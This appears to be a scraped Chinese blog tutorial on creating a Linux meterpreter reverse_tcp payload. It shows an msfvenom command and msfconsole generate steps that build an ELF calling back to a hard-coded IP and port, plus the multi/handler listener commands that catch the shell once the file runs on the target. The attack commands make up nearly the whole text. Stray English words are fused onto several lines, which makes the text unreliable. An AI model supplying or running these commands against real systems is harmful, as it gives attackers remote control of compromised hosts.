Linux下反弹meterpreter及生成payload的两种方式

一、CLI下生成payloadlinux

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.180.7.20 lport=4444 -f elf -o shell.elfshell

 

 

 

二、msfconsole下生成payloadtcp

use payload/linux/x86/meterpreter/reverse_tcp    并设置optionspa

 

 

generate -h  有丰富的选项code

 

 

generate -f elf -o /shell.elf   根据须要添加选项   -o输出文件到指定目录blog

 

 

 

三、在靶机上执行该文件,并在msf下监听it

在靶机上给文件赋值,并执行该文件io

 

 

在msf监听端口console

msf  >  use exploit/multi/handler
msf  >  set payload linux/x86/meterpreter/reverse_tcp
msf  >  set LHOST 10.180.7.20
msf  >  run
相关文章
相关标签/搜索